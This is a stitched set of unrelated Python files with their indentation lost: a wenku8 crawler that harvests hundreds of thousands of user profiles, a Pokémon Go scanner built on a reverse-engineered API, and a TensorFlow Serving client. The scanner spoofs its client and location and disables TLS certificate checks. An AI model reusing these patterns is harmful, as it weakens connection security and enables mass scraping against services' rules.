print(" * Shutting down...")
proxy.shutdown()
print(" * Shut down.")
@cli.command()
def connections():
"""List all TCP connections and the associated PIDs."""
connections = TcpConnectionTable()
connections.refresh()
for (ip, port), pid in connections.items():
print(f"{ip}:{port} -> {pid}")
if __name__ == "__main__":
cli()
|
run.py
|
from wenku8 import Wenku8
import threading
import pymongo
import time
# Global configuration
max_thread = 9 + 1
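# Upper id bounds for books, users and reviews to crawl.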
max_bid = 2596
max_uid = 530655
max_rid = 191767
# MongoDB database
client = pymongo.MongoClient()
db = client.wenku8
# Wenku8 crawler object
wk = Wenku8()
wk.login()
def db_book_info(result: dict):
print(result)
db.book.insert_one(result)
def db_review_info(result: dict):
print(result)
db.review.insert_one(result)
def db_user_info(result: dict):
print(result)
db.user.insert_one(result)
def get_books_info():
top = 1
while top <= max_bid:
        # Fill all available thread slots first, then top up whenever threads finish.
while len(threading.enumerate()) < max_thread and top <= max_bid:
t = threading.Thread(target=wk.fetch_book_info, args=(top, db_book_info))
top += 1
t.setDaemon(True)
t.start()
time.sleep(0.1)
def get_review_info():
top = 180206
while top <= max_rid:
        # Fill all available thread slots first, then top up whenever threads finish.
while len(threading.enumerate()) < max_thread * 2 and top <= max_rid:
t = threading.Thread(target=wk.fetch_reviews, args=(top, 0, None, db_review_info))
top += 1
t.setDaemon(True)
t.start()
time.sleep(0.1)
def get_user_info():
top = 331277
while top <= max_uid:
        # Fill all available thread slots first, then top up whenever threads finish.
while len(threading.enumerate()) < max_thread * 2 and top <= max_uid:
t = threading.Thread(target=wk.fetch_user_info, args=(top, db_user_info))
top += 1
t.setDaemon(True)
t.start()
time.sleep(0.1)
def main():
# get_books_info()
# get_review_info()
get_user_info()
if __name__ == '__main__':
main()
|
examplev3.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import functools
import werkzeug.serving
import pokemon_pb2
import time
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
if DEBUG:
print( '[-] {}'.format(message))
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
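# Reinterpret a double's bit pattern as an unsigned 64-bit integer (and back); coordinates are sent to the API in this encoding.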
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError) as e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
print( '[!] Your given location: {}'.format(loc.address.encode('utf-8')))
print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
while True:
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError) as e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
print( 'REQUEST:')
print( p_req)
print( 'Response:')
print( p_ret)
print( '''
''')
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
print ('[!] Google login for: {}'.format(username))
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
print ('[!] PTC login for: {}'.format(username))
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
    if r is None:
        return None
try:
jdata = json.loads(r.content)
except ValueError as e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
print ('[!] Trimming password to 15 characters')
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception as e:
if DEBUG:
print (r1.json()['errors'][0])
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', required=True)
parser.add_argument('-p', '--password', help='Password', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names or IDs to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names or IDs to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=False)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=False)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=5000)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.set_defaults(DEBUG=True)
return parser.parse_args()
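# Hedged usage sketch (not in the original source); the script name and all
# values below are placeholders showing how the arguments above combine:
#   python <this_script>.py -a ptc -u trainer42 -l "Central Park, New York" -st 5 -dp -dg -P 5000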
@memoize
def login(args):
global global_password
if not global_password:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
print ('[+] RPC Session Token: {} ...'.format(access_token[:25]))
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
print ('[+] Received API endpoint: {}'.format(api_endpoint))
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
print ('[+] Login successful')
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
print ('[+] Username: {}'.format(profile.profile.username))
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
print ('[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S')))
for curr in profile.profile.currency:
print ('[+] {}: {}'.format(curr.type, curr.amount))
return api_endpoint, access_token, profile_response
def main():
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
print ('[!] Invalid Auth service specified')
return
print('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
open(path + '/locales/pokemon.' + args.locale + '.json'))
if args.debug:
global DEBUG
DEBUG = True
print ('[!] DEBUG mode on')
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
print('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
api_endpoint, access_token, profile_response = login(args)
clear_stale_pokemons()
steplimit = int(args.step_limit)
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
for step in range(steplimit2):
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only)
print('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only):
print('[+] Searching for Pokemon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = {}
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
                    spawn_id = wild.SpawnPointId
                    if spawn_id not in seen or seen[spawn_id] <= wild.TimeTillHiddenMs:
                        visible.append(wild)
                        seen[spawn_id] = wild.TimeTillHiddenMs
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokeid = str(poke.pokemon.PokemonId)
pokename = pokemonsJSON[pokeid]
if args.ignore:
if pokename.lower() in ignore or pokeid in ignore:
continue
elif args.only:
if pokename.lower() not in only and pokeid not in only:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
def clear_stale_pokemons():
current_time = time.time()
    for pokemon_key in list(pokemons.keys()):  # copy keys so entries can be deleted while iterating
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
print ("[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng']))
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
if not werkzeug.serving.is_running_from_reloader():
debug(
'register_background_thread: not running inside Flask so not starting thread')
return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
print('[-] Invalid next location: %s,%s' % (lat, lon))
else:
print('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
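# Illustrative request against the route above (not part of the original file);
# host, port and coordinates are placeholders:
#   curl 'http://127.0.0.1:5000/next_loc?lat=40.7128&lon=-74.0060'
# The background search loop in main() picks up NEXT_LAT/NEXT_LONG on its next
# iteration and re-centres the scan there.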
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(74, 138, 202, .6)"
if gym[0] == 2:
color = "rgba(240, 68, 58, .6)"
if gym[0] == 3:
color = "rgba(254, 217, 40, .6)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
if stop[2] > 0:
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/PstopLured.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Lured Pokestop, expires at ' + stop[2],
})
else:
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Pokestop',
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='15', )
return fullmap
if __name__ == '__main__':
args = get_args()
register_background_thread(initial_registration=True)
app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
caffe_googlenet_client.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#!/usr/bin/env python2.7
"""Send JPEG image to tensorflow_model_server loaded with inception model.
"""
from __future__ import print_function
# This is a placeholder for a Google-internal import.
from grpc.beta import implementations
import tensorflow as tf
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
import time
import threading
import sys
tf.app.flags.DEFINE_string('server', 'localhost:9000',
'PredictionService host:port')
tf.app.flags.DEFINE_string('image', '', 'path to image in JPEG format')
FLAGS = tf.app.flags.FLAGS
import os.path as osp
import numpy as np
# def main(_):
# host, port = FLAGS.server.split(':')
# channel = implementations.insecure_channel(host, int(port))
# stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# # Send request
# with open(FLAGS.image, 'rb') as f:
# # See prediction_service.proto for gRPC request/response details.
# data = f.read()
# request = predict_pb2.PredictRequest()
# request.model_spec.name = 'caffe_googlenet'
# request.model_spec.signature_name = 'predict_images'
# request.inputs['images'].CopyFrom(
# tf.contrib.util.make_tensor_proto(data, shape=[1, 224, 224, 3]))
# result = stub.Predict(request, 10.0) # 10 secs timeout
# print(result.shape)
# def main(_):
# host, port = FLAGS.server.split(':')
# channel = implementations.insecure_channel(host, int(port))
# stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# # Send request
# # with open(FLAGS.image, 'rb') as f:
# if True:
# # See prediction_service.proto for gRPC request/response details.
# # data = f.read()
# image_path = FLAGS.image
# is_jpeg = check_is_jpeg(image_path)
# spec = std_spec(batch_size=200, isotropic=False)
# img = load_image(image_path, is_jpeg, spec)
# processed_img = process_image(img=img,
# scale=spec.scale_size,
# isotropic=spec.isotropic,
# crop=spec.crop_size,
# mean=spec.mean)
# request = predict_pb2.PredictRequest()
# request.model_spec.name = 'caffe_googlenet'
# request.model_spec.signature_name = 'predict_images'
# request.inputs['images'].CopyFrom(
# processed_img.reshape(1, 224, 224, 3))
# result = stub.Predict(request, 10.0) # 10 secs timeout
# print(result.shape)
def display_results(image_paths, probs):
'''Displays the classification results given the class probability for each image'''
# Get a list of ImageNet class labels
with open('/home/yitao/Documents/fun-project/caffe-tensorflow/examples/imagenet/imagenet-classes.txt', 'rb') as infile:
class_labels = map(str.strip, infile.readlines())
# Pick the class with the highest confidence for each image
class_indices = np.argmax(probs, axis=1)
# Display the results
print('\n{:20} {:30} {}'.format('Image', 'Classified As', 'Confidence'))
print('-' * 70)
for img_idx, image_path in enumerate(image_paths):
img_name = osp.basename(image_path)
class_name = class_labels[class_indices[img_idx]]
confidence = round(probs[img_idx, class_indices[img_idx]] * 100, 2)
print('{:20} {:30} {} %'.format(img_name, class_name, confidence))
# def main(_):
# host, port = FLAGS.server.split(':')
# channel = implementations.insecure_channel(host, int(port))
# stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# # Send request
# # with open(FLAGS.image, 'rb') as f:
# if True:
# # See prediction_service.proto for gRPC request/response details.
# # data = f.read()
# request = predict_pb2.PredictRequest()
# request.model_spec.name = 'caffe_googlenet'
# request.model_spec.signature_name = 'predict_images'
# request.inputs['image_name'].CopyFrom(
# tf.contrib.util.make_tensor_proto(FLAGS.image))
# result = stub.Predict(request, 10.0) # 10 secs timeout
# print(result.outputs["scores"].dtype)
# print(result.outputs["scores"].tensor_shape)
# tomList = []
# for float_val in result.outputs["scores"].float_val:
# tomList.append(float(float_val))
# tomArray = np.array(tomList, dtype=np.float32).reshape(1, 1000)
# # print(tomArray.shape)
# # print(tomArray.dtype)
# display_results([FLAGS.image], tomArray)
# def main(_):
# host, port = FLAGS.server.split(':')
# channel = implementations.insecure_channel(host, int(port))
# stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# # Send request
# with open(FLAGS.image, 'rb') as f:
# # See prediction_service.proto for gRPC request/response details.
# data = f.read()
# request = predict_pb2.PredictRequest()
# request.model_spec.name = 'caffe_googlenet'
# request.model_spec.signature_name = 'predict_images'
# request.inputs['images'].CopyFrom(
# tf.contrib.util.make_tensor_proto(data, shape=[1]))
# result = stub.Predict(request, 10.0) # 10 secs timeout
# # print(result)
# # print(result.outputs["scores"].dtype)
# print(result.outputs["scores"].tensor_shape)
# tomList = []
# for float_val in result.outputs["scores"].float_val:
# tomList.append(float(float_val))
# tomArray = np.array(tomList, dtype=np.float32).reshape(1, 1000)
# # print(tomArray.shape)
# # print(tomArray.dtype)
# display_results([FLAGS.image], tomArray)
def myFuncWarmUp(stub, i):
request = predict_pb2.PredictRequest()
request.model_spec.name = 'caffe_googlenet'
request.model_spec.signature_name = 'predict_images'
batchSize = 100
durationSum = 0.0
runNum = 13
for k in range(runNum):
image_data = []
start = time.time()
for j in range(batchSize):
image = "/home/yitao/Downloads/inception-input/%s/dog-%s.jpg" % (str(i % 100).zfill(3), str(j).zfill(3))
with open(image, 'rb') as f:
image_data.append(f.read())
request.inputs['images'].CopyFrom(
tf.contrib.util.make_tensor_proto(image_data, shape=[len(image_data)]))
